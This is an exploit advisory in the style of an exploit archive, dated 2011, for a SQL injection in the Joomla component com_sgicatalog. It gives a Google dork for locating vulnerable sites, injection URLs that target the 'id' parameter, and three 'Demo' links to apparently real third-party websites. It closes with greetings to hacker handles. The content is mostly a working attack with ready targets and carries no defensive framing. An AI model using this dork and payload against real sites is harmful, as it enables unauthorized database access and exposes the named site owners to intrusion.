#### # Exploit Title: Joomla Component (com_sgicatalog) <= SQL Injection Vulnerability # Google Dork: inurl:index.php?option=com_sgicatalog # Date: 2011-10-12 # Author: BHG Security Center # Home: Http://black-hg.org # Software Link: http://joomlaapps.com/ # Version: 1.x # Tested on: [Windows XP- Persian] # CVE : Webapps #### [*] ExpLo!T : http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=-416' http://127.0.0.1/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi] http://127.0.0.1/path/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi] [*] Demo : http://umbertodei.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416' [*] Demo : http://www.holmac.com/index.php?option=com_sgicatalog&task=view&lang=en&id=-416' [*] Demo : http://www.anisap.veneto.it/index.php?option=com_sgicatalog&task=view&lang=en&id=-416' #### [+] Peace From #BHG Vunl Component : com_sgicatalog Error in file joomla Component (com_sgicatalog) Sql Injection A vulnerable parameter $ en&id= #### =================================**BHG Security Center**=====================================| # Greets To : | | Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili | cmaxx ~ G3n3Rall ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y | s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ | ============================================================================================ |